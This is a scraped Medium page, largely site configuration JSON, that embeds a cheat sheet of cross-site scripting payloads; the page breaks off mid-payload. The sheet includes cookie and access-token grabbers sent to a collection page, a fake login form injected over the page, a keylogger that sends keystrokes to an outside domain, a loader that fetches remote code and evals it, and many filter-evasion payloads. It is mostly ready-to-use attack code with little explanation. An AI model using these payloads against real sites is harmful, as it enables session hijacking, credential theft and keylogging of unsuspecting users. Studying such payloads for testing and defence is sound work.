um.com\\u002Fhc\\u002Fen-us\\u002Farticles\\u002F360043290473\",\"logo\":{\"@typ
e\":\"ImageObject\",\"url\":\"https:\\u002F\\u002Fmiro.medium.com\\u002Fmax\\u002F540\\u002F1*cw32fIqCbRWzwJaoQw6BUg.png\",\"width\":540,\"height\":123}}},\"8ccfed20cbb2\":{\"name\":\"Zora\",\"data\":{\"@type\":\"NewsMediaOrganization\",\"ethicsPolicy\":\"https:\\u002F\\u002Fhelp.medium.com\\u002Fhc\\u002Fen-us\\u002Farticles\\u002F360043290473\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https:\\u002F\\u002Fmiro.medium.com\\u002Fmax\\u002F540\\u002F1*tZUQqRcCCZDXjjiZ4bDvgQ.png\",\"width\":540,\"height\":106}}}},\"embeddedPostIds\":{\"coronavirus\":\"cd3010f9d81f\"},\"sharedCdcMessaging\":{\"COVID_APPLICABLE_TAG_SLUGS\":[],\"COVID_APPLICABLE_TOPIC_NAMES\":[],\"COVID_APPLICABLE_TOPIC_NAMES_FOR_TOPIC_PAGE\":[],\"COVID_MESSAGES\":{\"tierA\":{\"text\":\"For more information on the novel coronavirus and Covid-19, visit cdc.gov.\",\"markups\":[{\"start\":66,\"end\":73,\"href\":\"https:\\u002F\\u002Fwww.cdc.gov\\u002Fcoronavirus\\u002F2019-nCoV\"}]},\"tierB\":{\"text\":\"Anyone can publish on Medium per our Policies, but we don’t fact-check every story. For more info about the coronavirus, see cdc.gov.\",\"markups\":[{\"start\":37,\"end\":45,\"href\":\"https:\\u002F\\u002Fhelp.medium.com\\u002Fhc\\u002Fen-us\\u002Fcategories\\u002F201931128-Policies-Safety\"},{\"start\":125,\"end\":132,\"href\":\"https:\\u002F\\u002Fwww.cdc.gov\\u002Fcoronavirus\\u002F2019-nCoV\"}]},\"paywall\":{\"text\":\"This article has been made free for everyone, thanks to Medium Members. For more information on the novel coronavirus and Covid-19, visit cdc.gov.\",\"markups\":[{\"start\":56,\"end\":70,\"href\":\"https:\\u002F\\u002Fmedium.com\\u002Fmembership\"},{\"start\":138,\"end\":145,\"href\":\"https:\\u002F\\u002Fwww.cdc.gov\\u002Fcoronavirus\\u002F2019-nCoV\"}]},\"unbound\":{\"text\":\"This article is free for everyone, thanks to Medium Members. 
For more information on the novel coronavirus and Covid-19, visit cdc.gov.\",\"markups\":[{\"start\":45,\"end\":59,\"href\":\"https:\\u002F\\u002Fmedium.com\\u002Fmembership\"},{\"start\":127,\"end\":134,\"href\":\"https:\\u002F\\u002Fwww.cdc.gov\\u002Fcoronavirus\\u002F2019-nCoV\"}]}},\"COVID_BANNER_POST_ID_OVERRIDE_WHITELIST\":[\"3b31a67bff4a\"]},\"sharedVoteMessaging\":{\"TAGS\":[\"politics\",\"election-2020\",\"government\",\"us-politics\",\"election\",\"2020-presidential-race\",\"trump\",\"donald-trump\",\"democrats\",\"republicans\",\"congress\",\"republican-party\",\"democratic-party\",\"biden\",\"joe-biden\",\"maga\"],\"TOPICS\":[\"politics\",\"election\"],\"MESSAGE\":{\"text\":\"Find out more about the U.S. election results here.\",\"markups\":[{\"start\":46,\"end\":50,\"href\":\"https:\\u002F\\u002Fcookpolitical.com\\u002F2020-national-popular-vote-tracker\"}]},\"EXCLUDE_POSTS\":[\"397ef29e3ca5\"]},\"embedPostRules\":[],\"recircOptions\":{\"v1\":{\"limit\":3},\"v2\":{\"limit\":8}},\"braintreeClientKey\":\"production_zjkj96jm_m56f8fqpf7ngnrd4\",\"braintree\":{\"enabled\":true,\"merchantId\":\"m56f8fqpf7ngnrd4\",\"merchantAccountId\":{\"usd\":\"AMediumCorporation_instant\",\"eur\":\"amediumcorporation_EUR\",\"cad\":\"amediumcorporation_CAD\"},\"publicKey\":\"ds2nn34bg2z7j5gd\",\"braintreeEnvironment\":\"production\",\"dashboardUrl\":\"https:\\u002F\\u002Fwww.braintreegateway.com\\u002Fmerchants\",\"gracePeriodDurationInDays\":14,\"mediumMembershipPlanId\":{\"monthly\":\"ce105f8c57a3\",\"monthlyV2\":\"e8a5e126-792b-4ee6-8fba-d574c1b02fc5\",\"monthlyWithTrial\":\"d5ee3dbe3db8\",\"monthlyPremium\":\"fa741a9b47a2\",\"yearly\":\"a40ad4a43185\",\"yearlyV2\":\"3815d7d6-b8ca-4224-9b8c-182f9047866e\",\"yearlyStaff\":\"d74fb811198a\",\"yearlyWithTrial\":\"b3bc7350e5c7\",\"yearlyPremium\":\"e21bd2c12166\",\"monthlyOneYearFree\":\"e6c0637a-2bad-4171-ab4f-3c268633d83c\",\"monthly25PercentOffFirstYear\":\"235ecc62-0cdb-49ae-9378-726cd21c504b\",\"monthly20PercentOffFirstYe
ar\":\"ba518864-9c13-4a99-91ca-411bf0cac756\",\"monthly15PercentOffFirstYear\":\"594c029b-9f89-43d5-88f8-8173af4e070e\",\"monthly10PercentOffFirstYear\":\"c6c7bc9a-40f2-4b51-8126-e28511d5bdb0\",\"monthlyForStudents\":\"629ebe51-da7d-41fd-8293-34cd2f2030a8\",\"yearlyOneYearFree\":\"78ba7be9-0d9f-4ece-aa3e-b54b826f2bf1\",\"yearly25PercentOffFirstYear\":\"2dbb010d-bb8f-4eeb-ad5c-a08509f42d34\",\"yearly20PercentOffFirstYear\":\"47565488-435b-47f8-bf93-40d5fbe0ebc8\",\"yearly15PercentOffFirstYear\":\"8259809b-0881-47d9-acf7-6c001c7f720f\",\"yearly10PercentOffFirstYear\":\"9dd694fb-96e1-472c-8d9e-3c868d5c1506\",\"yearlyForStudents\":\"e29345ef-ab1c-4234-95c5-70e50fe6bc23\",\"monthlyCad\":\"p52orjkaceei\",\"yearlyCad\":\"h4q9g2up9ktt\"},\"braintreeDiscountId\":{\"oneMonthFree\":\"MONTHS_FREE_01\",\"threeMonthsFree\":\"MONTHS_FREE_03\",\"sixMonthsFree\":\"MONTHS_FREE_06\",\"fiftyPercentOffOneYear\":\"FIFTY_PERCENT_OFF_ONE_YEAR\"},\"3DSecureVersion\":\"2\",\"defaultCurrency\":\"usd\",\"providerPlanIdCurrency\":{\"4ycw\":\"usd\",\"rz3b\":\"usd\",\"3kqm\":\"usd\",\"jzw6\":\"usd\",\"c2q2\":\"usd\",\"nnsw\":\"usd\",\"q8qw\":\"usd\",\"d9y6\":\"usd\",\"fx7w\":\"cad\",\"nwf2\":\"cad\"}},\"paypalClientId\":\"AXj1G4fotC2GE8KzWX9mSxCH1wmPE3nJglf4Z2ig_amnhvlMVX87otaq58niAg9iuLktVNF_1WCMnN7v\",\"paypal\":{\"host\":\"https:\\u002F\\u002Fapi.paypal.com:443\",\"clientMode\":\"production\",\"serverMode\":\"live\",\"webhookId\":\"4G466076A0294510S\",\"monthlyPlan\":{\"planId\":\"P-9WR0658853113943TMU5FDQA\",\"name\":\"Medium Membership (Monthly) with setup fee\",\"description\":\"Unlimited access to the best and brightest stories on Medium. Membership billed monthly.\"},\"yearlyPlan\":{\"planId\":\"P-7N8963881P8875835MU5JOPQ\",\"name\":\"Medium Membership (Annual) with setup fee\",\"description\":\"Unlimited access to the best and brightest stories on Medium. 
Membership billed annually.\"},\"oneYearGift\":{\"name\":\"Medium Membership (1 Year, Digital Gift Code)\",\"description\":\"Unlimited access to the best and brightest stories on Medium. Gift codes can be redeemed at medium.com\\u002Fredeem.\",\"price\":\"50.00\",\"currency\":\"USD\",\"sku\":\"membership-gift-1-yr\"},\"oldMonthlyPlan\":{\"planId\":\"P-96U02458LM656772MJZUVH2Y\",\"name\":\"Medium Membership (Monthly)\",\"description\":\"Unlimited access to the best and brightest stories on Medium. Membership billed monthly.\"},\"oldYearlyPlan\":{\"planId\":\"P-59P80963JF186412JJZU3SMI\",\"name\":\"Medium Membership (Annual)\",\"description\":\"Unlimited access to the best and brightest stories on Medium. Membership billed annually.\"},\"monthlyPlanWithTrial\":{\"planId\":\"P-66C21969LR178604GJPVKUKY\",\"name\":\"Medium Membership (Monthly) with setup fee\",\"description\":\"Unlimited access to the best and brightest stories on Medium. Membership billed monthly.\"},\"yearlyPlanWithTrial\":{\"planId\":\"P-6XW32684EX226940VKCT2MFA\",\"name\":\"Medium Membership (Annual) with setup fee\",\"description\":\"Unlimited access to the best and brightest stories on Medium. Membership billed annually.\"},\"oldMonthlyPlanNoSetupFee\":{\"planId\":\"P-4N046520HR188054PCJC7LJI\",\"name\":\"Medium Membership (Monthly)\",\"description\":\"Unlimited access to the best and brightest stories on Medium. Membership billed monthly.\"},\"oldYearlyPlanNoSetupFee\":{\"planId\":\"P-7A4913502Y5181304CJEJMXQ\",\"name\":\"Medium Membership (Annual)\",\"description\":\"Unlimited access to the best and brightest stories on Medium. 
Membership billed annually.\"},\"sdkUrl\":\"https:\\u002F\\u002Fwww.paypal.com\\u002Fsdk\\u002Fjs\"},\"stripePublishableKey\":\"pk_live_7FReX44VnNIInZwrIIx6ghjl\",\"log\":{\"json\":true,\"level\":\"info\"},\"imageUploadMaxSizeMb\":25,\"staffPicks\":{\"title\":\"Staff Picks\",\"catalogId\":\"c7bc6e1ee00f\"}},\"session\":{\"xsrf\":\"\"}}\u003c\/script\u003e\u003cscript\u003ewindow.__APOLLO_STATE__ = {\"ROOT_QUERY\":{\"__typename\":\"Query\",\"viewer\":null,\"collectionByDomainOrSlug({\\\"domainOrSlug\\\":\\\"androx47.medium.com\\\"})\":null,\"postResult({\\\"id\\\":\\\"6a492d795c0\\\"})\":{\"__ref\":\"Post:6a492d795c0\"}},\"LinkedAccounts:6a7d492724f5\":{\"__typename\":\"LinkedAccounts\",\"mastodon\":null,\"id\":\"6a7d492724f5\"},\"UserViewerEdge:userId:6a7d492724f5-viewerId:lo_2f5a867f56fa\":{\"__typename\":\"UserViewerEdge\",\"id\":\"userId:6a7d492724f5-viewerId:lo_2f5a867f56fa\",\"isFollowing\":false,\"isUser\":false,\"isMuting\":false},\"NewsletterV3:fa795b48caf5\":{\"__typename\":\"NewsletterV3\",\"id\":\"fa795b48caf5\",\"type\":\"NEWSLETTER_TYPE_AUTHOR\",\"slug\":\"6a7d492724f5\",\"name\":\"6a7d492724f5\",\"collection\":null,\"user\":{\"__ref\":\"User:6a7d492724f5\"}},\"User:6a7d492724f5\":{\"__typename\":\"User\",\"id\":\"6a7d492724f5\",\"name\":\"Pintu Solanki\",\"username\":\"androx47\",\"newsletterV3\":{\"__ref\":\"NewsletterV3:fa795b48caf5\"},\"linkedAccounts\":{\"__ref\":\"LinkedAccounts:6a7d492724f5\"},\"isSuspended\":false,\"imageId\":\"1*XmnNMYitXeyQnWuG-Yv_xQ.jpeg\",\"mediumMemberAt\":0,\"verifications\":{\"__typename\":\"VerifiedInfo\",\"isBookAuthor\":false},\"socialStats\":{\"__typename\":\"SocialStats\",\"followerCount\":92},\"customDomainState\":{\"__typename\":\"CustomDomainState\",\"live\":{\"__typename\":\"CustomDomain\",\"domain\":\"androx47.medium.com\"}},\"hasSubdomain\":true,\"bio\":\"With the new day comes new strength and new 
thoughts.\",\"isPartnerProgramEnrolled\":false,\"viewerEdge\":{\"__ref\":\"UserViewerEdge:userId:6a7d492724f5-viewerId:lo_2f5a867f56fa\"},\"viewerIsUser\":false,\"postSubscribeMembershipUpsellShownAt\":0,\"allowNotes\":true,\"twitterScreenName\":\"androx47\",\"membership\":null},\"Paragraph:3dfccc9ad6b7_0\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_0\",\"name\":\"579f\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Cross site scripting (XSS) Payloads\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":20,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null},{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":22,\"end\":25,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_1\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_1\",\"name\":\"e497\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"How does XSS work?\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_2\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_2\",\"name\":\"5429\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Cross-site scripting works by manipulating a vulnerable web site so that it returns malicious JavaScript to users. 
When the malicious code executes inside a victim’s browser, the attacker can fully compromise their interaction with the application.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":26,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_3\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_3\",\"name\":\"4dde\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Data grabber for XSS\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_4\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_4\",\"name\":\"7d70\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"The following payloads obtain the administrator cookie or a sensitive access token and send it to a controlled page. A cookie set with the HttpOnly flag is not readable through document.cookie, so session cookies should carry that flag.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_5\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_5\",\"name\":\"3827\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cscript\\u003Edocument.location='http:\\u002F\\u002Flocalhost\\u002FXSS\\u002Fgrabber.php?c='+document.cookie\\u003C\\u002Fscript\\u003E\\n\\u003Cscript\\u003Edocument.location='http:\\u002F\\u002Flocalhost\\u002FXSS\\u002Fgrabber.php?c='+localStorage.getItem('access_token')\\u003C\\u002Fscript\\u003E\\n\\u003Cscript\\u003Enew Image().src=\\\"http:\\u002F\\u002Flocalhost\\u002Fcookie.php?c=\\\"+document.cookie;\\u003C\\u002Fscript\\u003E\\n\\u003Cscript\\u003Enew 
Image().src=\\\"http:\\u002F\\u002Flocalhost\\u002Fcookie.php?c=\\\"+localStorage.getItem('access_token');\\u003C\\u002Fscript\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_6\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_6\",\"name\":\"4e0e\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"UI redressing\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_7\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_7\",\"name\":\"c617\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Leverage the XSS to modify the HTML content of the page in order to display a fake login form.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_8\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_8\",\"name\":\"67d7\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cscript\\u003E\\nhistory.replaceState(null, null, '..\\u002F..\\u002F..\\u002Flogin');\\ndocument.body.innerHTML = \\\"\\u003C\\u002Fbr\\u003E\\u003C\\u002Fbr\\u003E\\u003C\\u002Fbr\\u003E\\u003C\\u002Fbr\\u003E\\u003C\\u002Fbr\\u003E\\u003Ch1\\u003EPlease login to continue\\u003C\\u002Fh1\\u003E\\u003Cform\\u003EUsername: \\u003Cinput type='text'\\u003EPassword: \\u003Cinput type='password'\\u003E\\u003C\\u002Fform\\u003E\\u003Cinput value='submit' type='submit'\\u003E\\\"\\n\\u003C\\u002Fscript\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_9\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_9\",\"name\":\"92d9\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Javascript 
keylogger\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_10\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_10\",\"name\":\"909e\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Another way to collect sensitive data is to set a javascript keylogger.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_11\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_11\",\"name\":\"6bee\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cimg src=x onerror='document.onkeypress=function(e){fetch(\\\"http:\\u002F\\u002Fdomain.com?k=\\\"+String.fromCharCode(e.which))},this.remove();'\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_12\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_12\",\"name\":\"810b\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in HTML\\u002FApplications\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_13\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_13\",\"name\":\"47f7\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Common Payloads\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":15,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_14\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_14\",\"name\":\"3a69\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u002F\\u002F Basic 
payload\\n\\u003Cscript\\u003Ealert('XSS')\\u003C\\u002Fscript\\u003E\\n\\u003Cscr\\u003Cscript\\u003Eipt\\u003Ealert('XSS')\\u003C\\u002Fscr\\u003Cscript\\u003Eipt\\u003E\\n\\\"\\u003E\\u003Cscript\\u003Ealert('XSS')\\u003C\\u002Fscript\\u003E\\n\\\"\\u003E\\u003Cscript\\u003Ealert(String.fromCharCode(88,83,83))\\u003C\\u002Fscript\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_15\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_15\",\"name\":\"6b9c\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u002F\\u002F Img payload\\n\\u003Cimg src=x onerror=alert('XSS');\\u003E\\n\\u003Cimg src=x onerror=alert('XSS')\\u002F\\u002F\\n\\u003Cimg src=x onerror=alert(String.fromCharCode(88,83,83));\\u003E\\n\\u003Cimg src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));\\u003E\\n\\u003Cimg src=x:alert(alt) onerror=eval(src) alt=xss\\u003E\\n\\\"\\u003E\\u003Cimg src=x onerror=alert('XSS');\\u003E\\n\\\"\\u003E\\u003Cimg src=x onerror=alert(String.fromCharCode(88,83,83));\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_16\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_16\",\"name\":\"87fa\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u002F\\u002F Svg payload\\n\\u003Csvg\\fonload=alert(1)\\u003E\\n\\u003Csvg\\u002Fonload=alert('XSS')\\u003E\\n\\u003Csvg onload=alert(1)\\u002F\\u002F\\n\\u003Csvg\\u002Fonload=alert(String.fromCharCode(88,83,83))\\u003E\\n\\u003Csvg id=alert(1) onload=eval(id)\\u003E\\n\\\"\\u003E\\u003Csvg\\u002Fonload=alert(String.fromCharCode(88,83,83))\\u003E\\n\\\"\\u003E\\u003Csvg\\u002Fonload=alert(\\u002FXSS\\u002F)\\n\\u003Csvg\\u003E\\u003Cscript href=data:,alert(1) \\u002F\\u003E(`Firefox` is the only browser which allows self closing 
script)\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_17\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_17\",\"name\":\"ebf4\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u002F\\u002F Div payload\\n\\u003Cdiv onpointerover=\\\"alert(45)\\\"\\u003EMOVE HERE\\u003C\\u002Fdiv\\u003E\\n\\u003Cdiv onpointerdown=\\\"alert(45)\\\"\\u003EMOVE HERE\\u003C\\u002Fdiv\\u003E\\n\\u003Cdiv onpointerenter=\\\"alert(45)\\\"\\u003EMOVE HERE\\u003C\\u002Fdiv\\u003E\\n\\u003Cdiv onpointerleave=\\\"alert(45)\\\"\\u003EMOVE HERE\\u003C\\u002Fdiv\\u003E\\n\\u003Cdiv onpointermove=\\\"alert(45)\\\"\\u003EMOVE HERE\\u003C\\u002Fdiv\\u003E\\n\\u003Cdiv onpointerout=\\\"alert(45)\\\"\\u003EMOVE HERE\\u003C\\u002Fdiv\\u003E\\n\\u003Cdiv onpointerup=\\\"alert(45)\\\"\\u003EMOVE HERE\\u003C\\u002Fdiv\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_18\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_18\",\"name\":\"baf3\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS using HTML5 tags\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":20,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_19\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_19\",\"name\":\"fff6\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cbody onload=alert(\\u002FXSS\\u002F.source)\\u003E\\n\\u003Cinput autofocus onfocus=alert(1)\\u003E\\n\\u003Cselect autofocus onfocus=alert(1)\\u003E\\n\\u003Ctextarea autofocus onfocus=alert(1)\\u003E\\n\\u003Ckeygen autofocus 
onfocus=alert(1)\\u003E\\n\\u003Cvideo\\u002Fposter\\u002Fonerror=alert(1)\\u003E\\n\\u003Cvideo\\u003E\\u003Csource onerror=\\\"javascript:alert(1)\\\"\\u003E\\n\\u003Cvideo src=_ onloadstart=\\\"alert(1)\\\"\\u003E\\n\\u003Cdetails\\u002Fopen\\u002Fontoggle=\\\"alert`1`\\\"\\u003E\\n\\u003Caudio src onloadstart=alert(1)\\u003E\\n\\u003Cmarquee onstart=alert(1)\\u003E\\n\\u003Cmeter value=2 min=0 max=10 onmouseover=alert(1)\\u003E2 out of 10\\u003C\\u002Fmeter\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_20\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_20\",\"name\":\"ed4e\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cbody ontouchstart=alert(1)\\u003E \\u002F\\u002F Triggers when a finger touch the screen\\n\\u003Cbody ontouchend=alert(1)\\u003E   \\u002F\\u002F Triggers when a finger is removed from touch screen\\n\\u003Cbody ontouchmove=alert(1)\\u003E  \\u002F\\u002F When a finger is dragged across the screen.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_21\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_21\",\"name\":\"3538\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS using a remote 
JS\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":21,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_22\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_22\",\"name\":\"7e03\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Csvg\\u002Fonload='fetch(\\\"\\u002F\\u002Fhost\\u002Fa\\\").then(r=\\u003Er.text().then(t=\\u003Eeval(t)))'\\u003E\\n\\u003Cscript src=14.rs\\u003E\\n\\u002F\\u002F you can also specify an arbitrary payload with 14.rs\\u002F#payload\\ne.g: 14.rs\\u002F#alert(document.domain)\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_23\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_23\",\"name\":\"f981\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in hidden input\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":19,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_24\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_24\",\"name\":\"6e21\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cinput type=\\\"hidden\\\" accesskey=\\\"X\\\" onclick=\\\"alert(1)\\\"\\u003E\\nUse CTRL+SHIFT+X to trigger the onclick event\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_25\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_25\",\"name\":\"d820\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"DOM based 
XSS\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_26\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_26\",\"name\":\"3e61\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Based on a DOM XSS sink.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":24,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_27\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_27\",\"name\":\"2902\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"#\\\"\\u003E\\u003Cimg src=\\u002F 